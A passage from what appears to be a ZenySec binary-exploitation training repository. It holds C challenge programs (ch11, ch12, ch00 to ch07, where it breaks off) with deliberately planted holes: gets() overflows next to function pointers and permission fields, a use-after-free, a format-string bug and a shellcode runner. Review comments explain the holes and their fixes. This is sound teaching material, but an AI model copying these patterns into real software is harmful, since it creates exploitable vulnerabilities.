13 | typedef struct{
14 |     char junk01[BUF_SIZE];
15 |     char junk02[BUF_SIZE];
16 |     void (*func_ptr)();
17 | } important;
18 | /* Prints the flag file by running "cat flag" through system(). No direct call to it appears in this file. */
19 | void secret(){
20 |     system("cat flag");
21 | }
22 | /* Allocates a message and an `important` object, reads name and body into the message,
      * calls object_01->func_ptr when it is non-zero, then echoes the message.
      * NOTE(review): gets() into msg->content has no length limit, so long input is
      * written past the heap allocation (CWE-242 / CWE-122); use
      * fgets(msg->content, sizeof msg->content, stdin). object_01 is never initialised,
      * so func_ptr holds whatever bytes malloc() returned; calloc() or an explicit
      * assignment would define it. Both malloc() results are unchecked and neither
      * allocation is freed, so each call leaks them.
      */
23 | void send(){
24 |
25 |     message* msg = (message*) malloc(sizeof(message));
26 |     important* object_01 = (important*) malloc(sizeof(important));
27 |
28 |     printf("Creating message\n");
29 |     printf("Enter message name:");
30 |     fgets(msg->name, BUF_SIZE, stdin);
31 |     printf("Enter message content:");
32 |     gets(msg->content); /* unbounded read into a heap buffer */
33 |
34 |     if (object_01->func_ptr){ /* reads a field that was never written by this code */
35 |         object_01->func_ptr();
36 |     }
37 |
38 |     printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
39 | }
40 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
41 | int menu(){
42 |     char buffer[BUF_SIZE] = {0};
43 |
44 |     printf("[*] menu\n");
45 |     printf("menu - show this menu\n");
46 |     printf("send - send new message\n");
47 |     printf("exit - close program\n");
48 |
49 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
50 |
51 |     if (strcmp(buffer, "menu\n") == 0){
52 |         return 1;
53 |     }
54 |     else if (strcmp(buffer, "send\n") == 0){
55 |         send();
56 |         return 1;
57 |     }
58 |     else if (strcmp(buffer, "exit\n") == 0){
59 |         return 0;
60 |     }
61 |     else{
62 |         printf("Unknown command: %s", buffer);
63 |         return 1;
64 |     }
65 |
66 | }
67 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
68 | int main(int argc, char **argv){
69 |     setbuf(stdout, NULL);
70 |     uid_t uid = geteuid();
71 |     setresuid(uid,uid,uid); /* result unchecked */
72 |     printf("Welcome to ch11!\n");
73 |     while(1){
74 |         if (!(menu())){
75 |             break;
76 |         }
77 |         printf("\n");
78 |     }
79 |     printf("Exiting...\n");
80 | }
81 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch11/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch11.c -static -no-pie -o $1/ch11
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch11/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch12/ch12.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Heap record for one message: two fixed-size character arrays. */
8 | typedef struct{
9 |     char name[BUF_SIZE];
10 |     char content[BUF_SIZE];
11 | } message;
12 | /* Heap record that ends in a function pointer, preceded by two unused character arrays. */
13 | typedef struct{
14 |     char junk01[BUF_SIZE];
15 |     char junk02[BUF_SIZE];
16 |     void (*func_ptr)();
17 | } important;
18 | /* The single current worker; zero-initialised as a global, set by create_worker(). */
19 | important* work;
20 | /* Default worker routine: prints a marker. */
21 | void func(){
22 |     printf("[*] Working\n");
23 | }
24 | /* Prints the flag file by running "cat flag" through system(). Nothing in this file refers to it. */
25 | void secret(){
26 |     system("cat flag");
27 | }
28 | /* Allocates a worker, points its func_ptr at func() and prints the heap address.
      * NOTE(review): malloc() result unchecked; a previous worker is overwritten without
      * being freed; printing the pointer with %p discloses heap layout to the user. */
29 | void create_worker(){
30 |     work = (important*) malloc(sizeof(important));
31 |     work->func_ptr = func;
32 |     printf("Worker Created in %p\n", work);
33 | }
34 | /* Calls work->func_ptr. NOTE(review): no check that work is non-NULL or still allocated,
      * so this dereferences NULL before create_worker() and freed memory after free_worker() (CWE-416). */
35 | void start_worker(){
36 |     work->func_ptr();
37 | }
38 | /* Frees the current worker. NOTE(review): work keeps the stale address; setting
      * work = NULL after free() (and testing it in start_worker()) closes both the
      * use-after-free and the double free a repeated call causes (CWE-415). */
39 | void free_worker(){
40 |     free(work);
41 | }
42 | /* Allocates a message, prints its heap address, reads name and body into it and echoes them.
      * NOTE(review): gets() into msg->content has no length limit (CWE-242 / CWE-122);
      * malloc() result unchecked; the message is never freed. */
43 | void send(){
44 |     message* msg = (message*) malloc(sizeof(message));
45 |     printf("Message Created in %p\n", msg);
46 |
47 |     printf("Creating message\n");
48 |     printf("Enter message name:");
49 |     fgets(msg->name, BUF_SIZE, stdin);
50 |     printf("Enter message content:");
51 |     gets(msg->content); /* unbounded read into a heap buffer */
52 |     printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
53 | }
54 | /* Prints the command list, reads one line and dispatches on it (continues below). */
55 | int menu(){
56 |     char buffer[BUF_SIZE] = {0};
57 |
58 |     printf("[*] menu\n");
59 |     printf("menu - show this menu\n");
60 |     printf("send - send new message\n");
61 |     printf("create_worker - create worker\n");
62
|     printf("start_worker - run worker\n");
63 |     printf("free_worker - free current worker\n");
64 |     printf("exit - close program\n");
65 |
66 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty and 1 is returned */
67 |
68 |     if (strcmp(buffer, "menu\n") == 0){
69 |         return 1;
70 |     }
71 |     else if (strcmp(buffer, "create_worker\n") == 0){
72 |         create_worker();
73 |         return 1;
74 |     }
75 |     else if (strcmp(buffer, "start_worker\n") == 0){
76 |         start_worker(); /* reachable in any order relative to create_worker/free_worker */
77 |         return 1;
78 |     }
79 |     else if (strcmp(buffer, "free_worker\n") == 0){
80 |         free_worker();
81 |         return 1;
82 |     }
83 |     else if (strcmp(buffer, "send\n") == 0){
84 |         send();
85 |         return 1;
86 |     }
87 |     else if (strcmp(buffer, "exit\n") == 0){
88 |         return 0;
89 |     }
90 |     else{
91 |         printf("Unknown command: %s", buffer);
92 |         return 1;
93 |     }
94 |
95 | }
96 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
97 | int main(int argc, char **argv){
98 |     setbuf(stdout, NULL);
99 |     uid_t uid = geteuid();
100 |     setresuid(uid,uid,uid); /* result unchecked */
101 |     printf("Welcome to ch12!\n");
102 |     while(1){
103 |         if (!(menu())){
104 |             break;
105 |         }
106 |         printf("\n");
107 |     }
108 |     printf("Exiting...\n");
109 | }
110 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch12/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch12.c -static -no-pie -o $1/ch12
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch12/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/motd:
--------------------------------------------------------------------------------
1 |
2 | ZenySec
3 |
4 |
5 |
--------------------------------------------------------------------------------
/exercises-arm32v7/welcome/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/welcome.c -no-pie -o $1/welcome
2 |
-------------------------------------------------------------------------------- /exercises-arm32v7/welcome/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/welcome/welcome.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv){ 7 | uid_t uid = geteuid(); 8 | setresuid(uid,uid,uid); 9 | system("cat flag"); 10 | } 11 | -------------------------------------------------------------------------------- /exercises-i386/banner: -------------------------------------------------------------------------------- 1 | 2 | ███████╗███████╗███╗ ██╗██╗ ██╗███████╗███████╗ ██████╗ 3 | ╚══███╔╝██╔════╝████╗ ██║╚██╗ ██╔╝██╔════╝██╔════╝██╔════╝ 4 | ███╔╝ █████╗ ██╔██╗ ██║ ╚████╔╝ ███████╗█████╗ ██║ 5 | ███╔╝ ██╔══╝ ██║╚██╗██║ ╚██╔╝ ╚════██║██╔══╝ ██║ 6 | ███████╗███████╗██║ ╚████║ ██║ ███████║███████╗╚██████╗ 7 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═════╝ 8 | 9 | ██╗██████╗ █████╗ ██████╗ 10 | ██║╚════██╗██╔══██╗██╔════╝ 11 | ██║ █████╔╝╚█████╔╝███████╗ 12 | ██║ ╚═══██╗██╔══██╗██╔═══██╗ 13 | ██║██████╔╝╚█████╔╝╚██████╔╝ 14 | ╚═╝╚═════╝ ╚════╝ ╚═════╝ 15 | 16 | ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ 17 | ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ 18 | █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ 19 | ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ 20 | ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ 21 | ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ 22 | 23 | ███████╗██╗ ██╗███████╗██████╗ ██████╗██╗███████╗███████╗███████╗ 24 | 
██╔════╝╚██╗██╔╝██╔════╝██╔══██╗██╔════╝██║██╔════╝██╔════╝██╔════╝
25 | █████╗ ╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗█████╗ ███████╗
26 | ██╔══╝ ██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔══╝ ╚════██║
27 | ███████╗██╔╝ ██╗███████╗██║ ██║╚██████╗██║███████║███████╗███████║
28 | ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚══════╝╚══════╝╚══════╝
29 |
--------------------------------------------------------------------------------
/exercises-i386/ch00/ch00.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Prints the flag file by running "cat flag" through system(). */
8 | void secret(){
9 |     system("cat flag");
10 | }
11 | /* Reads a message name and body into a local struct, echoes them, and calls secret()
      * when the struct's `value` byte equals 0x7.
      * NOTE(review): value is initialised to 0 and never assigned, so that branch is
      * unreachable through the program's own logic. gets() into l.content has no length
      * limit (CWE-242 / CWE-121), and value is declared directly after content in the
      * same struct, so the decision byte sits next to an unbounded write. Use
      * fgets(l.content, sizeof l.content, stdin).
      */
12 | void send(){
13 |     struct locals{
14 |         char name[BUF_SIZE];
15 |         char content[BUF_SIZE];
16 |         char value;
17 |     };
18 |     struct locals l = {.value = 0, .content = {0}, .name = {0}};
19 |
20 |     printf("Creating message\n");
21 |     printf("Enter message name:");
22 |     fgets(l.name, BUF_SIZE, stdin);
23 |     printf("Enter message content:");
24 |     gets(l.content); /* unbounded read into a 50-byte struct member */
25 |
26 |     printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
27 |     if(l.value == 0x7){
28 |         secret();
29 |     }
30 | }
31 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
32 | int menu(){
33 |     char buffer[BUF_SIZE] = {0};
34 |
35 |     printf("[*] menu\n");
36 |     printf("menu - show this menu\n");
37 |     printf("send - send new message\n");
38 |     printf("exit - close program\n");
39 |
40 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
41 |
42 |     if (strcmp(buffer, "menu\n") == 0){
43 |         return 1;
44 |     }
45 |     else if (strcmp(buffer, "send\n") == 0){
46 |         send();
47 |         return 1;
48 |     }
49 |     else if (strcmp(buffer, "exit\n") == 0){
50 |         return 0;
51 |     }
52 |     else{
53 |         printf("Unknown command: %s", buffer);
54 |         return 1;
55 |     }
56 |
57 | }
58 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
59 | int main(int argc, char **argv){
60 |     setbuf(stdout, NULL);
61 |     uid_t uid = geteuid();
62 |     setresuid(uid,uid,uid); /* result unchecked */
63 |     printf("Welcome to ch00!\n");
64 |     while(1){
65 |         if (!(menu())){
66 |             break;
67 |         }
68 |         printf("\n");
69 |     }
70 |
printf("Exiting...\n");
71 | }
72 |
--------------------------------------------------------------------------------
/exercises-i386/ch00/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch00.c -static -no-pie -o $1/ch00
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch00/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch01/ch01.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Prints the flag file by running "cat flag" through system(). */
8 | void secret(){
9 |     system("cat flag");
10 | }
11 | /* Reads a message name and body into a local struct, echoes them, and calls secret()
      * when the struct's `admin` string equals "true".
      * NOTE(review): admin is initialised to "false" and never assigned, so that branch
      * is unreachable through the program's own logic. gets() into l.content has no
      * length limit (CWE-242 / CWE-121), and admin is declared directly after content in
      * the same struct, so the authorisation string sits next to an unbounded write.
      * Use fgets(l.content, sizeof l.content, stdin).
      */
12 | void send(){
13 |     struct locals{
14 |         char name[BUF_SIZE];
15 |         char content[BUF_SIZE];
16 |         char admin[BUF_SIZE];
17 |     };
18 |     struct locals l = {.name = {0}, .content = {0}, .admin = "false"};
19 |
20 |     printf("Creating message\n");
21 |     printf("Enter message name:");
22 |     fgets(l.name, BUF_SIZE, stdin);
23 |     printf("Enter message content:");
24 |     gets(l.content); /* unbounded read into a 50-byte struct member */
25 |
26 |     printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
27 |     if(!(strcmp(l.admin, "true"))){
28 |         secret();
29 |     }
30 | }
31 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
32 | int menu(){
33 |     char buffer[BUF_SIZE] = {0};
34 |
35 |     printf("[*] menu\n");
36 |     printf("menu - show this menu\n");
37 |     printf("send - send new message\n");
38 |     printf("exit - close program\n");
39 |
40 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
41 |
42 |     if (strcmp(buffer, "menu\n") == 0){
43 |         return 1;
44 |     }
45 |     else if (strcmp(buffer, "send\n") == 0){
46 |         send();
47 |         return 1;
48 |     }
49 |     else if (strcmp(buffer, "exit\n") == 0){
50 |         return 0;
51 |     }
52 |     else{
53 |         printf("Unknown command: %s", buffer);
54 |         return 1;
55 |     }
56 |
57 | }
58 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
59 | int main(int argc, char **argv){
60 |     setbuf(stdout, NULL);
61 |     uid_t uid =
geteuid();
62 |     setresuid(uid,uid,uid); /* real, effective and saved UID all become the effective UID; result unchecked */
63 |     printf("Welcome to ch01!\n");
64 |     while(1){
65 |         if (!(menu())){
66 |             break;
67 |         }
68 |         printf("\n");
69 |     }
70 |     printf("Exiting...\n");
71 | }
72 |
--------------------------------------------------------------------------------
/exercises-i386/ch01/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch01.c -static -no-pie -o $1/ch01
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch01/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch02/ch02.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Prints the flag file by running "cat flag" through system(). No direct call to it appears in this file. */
8 | void secret(){
9 |     system("cat flag");
10 | }
11 | /* Reads a message name and body into a local struct, echoes them, and calls the
      * struct's `hook` function pointer when it is non-zero.
      * NOTE(review): hook is initialised to 0 and never assigned, so the call is
      * unreachable through the program's own logic. gets() into l.content has no length
      * limit (CWE-242 / CWE-121), and hook is declared directly after content in the
      * same struct, so a code pointer sits next to an unbounded write. Use
      * fgets(l.content, sizeof l.content, stdin).
      */
12 | void send(){
13 |     struct locals{
14 |         char name[BUF_SIZE];
15 |         char content[BUF_SIZE];
16 |         void (*hook)();
17 |     };
18 |     struct locals l = {.name = {0}, .content = {0}, .hook = 0};
19 |
20 |     printf("Creating message\n");
21 |     printf("Enter message name:");
22 |     fgets(l.name, BUF_SIZE, stdin);
23 |     printf("Enter message content:");
24 |     gets(l.content); /* unbounded read into a 50-byte struct member */
25 |
26 |     printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
27 |
28 |     if(l.hook){
29 |         l.hook();
30 |     }
31 | }
32 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
33 | int menu(){
34 |     char buffer[BUF_SIZE] = {0};
35 |
36 |     printf("[*] menu\n");
37 |     printf("menu - show this menu\n");
38 |     printf("send - send new message\n");
39 |     printf("exit - close program\n");
40 |
41 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
42 |
43 |     if (strcmp(buffer, "menu\n") == 0){
44 |         return 1;
45 |     }
46 |     else if (strcmp(buffer, "send\n") == 0){
47 |         send();
48 |         return 1;
49 |     }
50 |     else if (strcmp(buffer, "exit\n") == 0){
51 |         return 0;
52 |     }
53 |     else{
54 |         printf("Unknown command: %s",
buffer);
55 |         return 1;
56 |     }
57 |
58 | }
59 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
60 | int main(int argc, char **argv){
61 |     setbuf(stdout, NULL);
62 |     uid_t uid = geteuid();
63 |     setresuid(uid,uid,uid); /* result unchecked */
64 |     printf("Welcome to ch02!\n");
65 |     while(1){
66 |         if (!(menu())){
67 |             break;
68 |         }
69 |         printf("\n");
70 |     }
71 |     printf("Exiting...\n");
72 | }
73 |
--------------------------------------------------------------------------------
/exercises-i386/ch02/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch02.c -static -no-pie -o $1/ch02
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch02/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch03/ch03.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Prints the flag file by running "cat flag" through system(). No call to it appears in this file. */
8 | void secret(){
9 |     system("cat flag");
10 | }
11 | /* Reads a message name (bounded fgets()) and body (unbounded gets()) and echoes them.
      * NOTE(review): gets() has no length limit, so long input is written past content[]
      * on the stack (CWE-242 / CWE-121); use fgets(content, sizeof content, stdin). The
      * compile.sh shown for this challenge passes -fno-stack-protector, so no canary
      * guards this frame.
      */
12 | void send(){
13 |     char name[BUF_SIZE] = {0};
14 |     char content[BUF_SIZE] = {0};
15 |
16 |     printf("Creating message\n");
17 |     printf("Enter message name:");
18 |     fgets(name, BUF_SIZE, stdin);
19 |     printf("Enter message content:");
20 |     gets(content); /* unbounded read into a 50-byte stack buffer */
21 |
22 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
23 | }
24 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
25 | int menu(){
26 |     char buffer[BUF_SIZE] = {0};
27 |
28 |     printf("[*] menu\n");
29 |     printf("menu - show this menu\n");
30 |     printf("send - send new message\n");
31 |     printf("exit - close program\n");
32 |
33 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
34 |
35 |     if (strcmp(buffer, "menu\n") == 0){
36 |         return 1;
37 |     }
38 |     else if (strcmp(buffer, "send\n") == 0){
39 |         send();
40 |         return 1;
41 |     }
42 |     else if (strcmp(buffer, "exit\n") == 0){
43 |         return 0;
44 |     }
45 |     else{
46 |         printf("Unknown command: %s", buffer);
47 |         return 1;
48
|     }
49 |
50 | }
51 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
52 | int main(int argc, char **argv){
53 |     setbuf(stdout, NULL);
54 |     uid_t uid = geteuid();
55 |     setresuid(uid,uid,uid); /* result unchecked */
56 |     printf("Welcome to ch03!\n");
57 |     while(1){
58 |         if (!(menu())){
59 |             break;
60 |         }
61 |         printf("\n");
62 |     }
63 |     printf("Exiting...\n");
64 | }
65 |
--------------------------------------------------------------------------------
/exercises-i386/ch03/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch03/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-i386/ch04/ch04.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Two writable globals declared back to back: the message body and the string send() compares with "root". */
8 | char content[BUF_SIZE*2] = "dummy";
9 | char perm[BUF_SIZE*2] = "user";
10 | /* Prints the flag file by running "cat flag" through system(). */
11 | void secret(){
12 |     system("cat flag");
13 | }
14 | /* Reads a message name and body, echoes them, and calls secret() when perm equals "root".
      * NOTE(review): name[] holds BUF_SIZE bytes but fgets() is given BUF_SIZE*2 as its
      * limit, so the "bounded" read can still run past the array (sizeof name is the
      * correct limit). gets() into the global content[] has no limit at all (CWE-242).
      * Nothing in this file assigns perm after its initialiser, so the access decision
      * rests on memory that only an out-of-bounds write could change; keep such state
      * away from input buffers and bound every read.
      */
15 | void send(){
16 |     char name[BUF_SIZE] = {0};
17 |     printf("Creating message\n");
18 |     printf("Enter message name:");
19 |     fgets(name, BUF_SIZE*2, stdin); /* limit is twice the size of name[] */
20 |     printf("Enter message content:");
21 |     gets(content); /* unbounded read into a global buffer */
22 |
23 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
24 |     if(strcmp(perm, "root") == 0){
25 |         secret();
26 |     }
27 | }
28 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
29 | int menu(){
30 |     char buffer[BUF_SIZE] = {0};
31 |
32 |     printf("[*] menu\n");
33 |     printf("menu - show this menu\n");
34 |     printf("send - send new message\n");
35 |     printf("exit - close program\n");
36 |
37 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
38 |
39 |     if (strcmp(buffer, "menu\n") == 0){
40 |         return 1;
41 |     }
42 |     else if (strcmp(buffer, "send\n") == 0){
43 |         send();
44 |         return 1;
45 |     }
46 |     else if (strcmp(buffer, "exit\n") ==
0){ 47 | return 0; 48 | } 49 | else{ 50 | printf("Unknown command: %s", buffer); 51 | return 1; 52 | } 53 | 54 | } 55 | 56 | int main(int argc, char **argv){ 57 | setbuf(stdout, NULL); 58 | uid_t uid = geteuid(); 59 | setresuid(uid,uid,uid); 60 | printf("Welcome to ch04!\n"); 61 | while(1){ 62 | if (!(menu())){ 63 | break; 64 | } 65 | printf("\n"); 66 | } 67 | printf("Exiting...\n"); 68 | } 69 | -------------------------------------------------------------------------------- /exercises-i386/ch04/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch04.c -static -no-pie -o $1/ch04 2 | -------------------------------------------------------------------------------- /exercises-i386/ch04/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch05/ch05.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE*2] = {0}; 14 | char content[BUF_SIZE*2] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE*2, stdin); 19 | printf("Enter message content:"); 20 | fgets(content, BUF_SIZE*2, stdin); 21 | 22 | printf("name: \"%s\"\ncontent:\"", name); 23 | printf(content); 24 | printf("\"\n"); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if 
(strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch05!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | exit(1); 67 | } 68 | -------------------------------------------------------------------------------- /exercises-i386/ch05/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch05.c -static -no-pie -o $1/ch05 2 | -------------------------------------------------------------------------------- /exercises-i386/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: 
\"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /exercises-i386/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /exercises-i386/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-i386/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char str[BUF_SIZE] = "/bin/sh\x00"; 9 | 10 | void func(){ 11 | system("ls"); 12 | } 13 | 14 | void send(){ 15 | char name[BUF_SIZE] = {0}; 16 | char content[BUF_SIZE] = {0}; 17 | 18 | printf("Creating message\n"); 19 | printf("Enter 
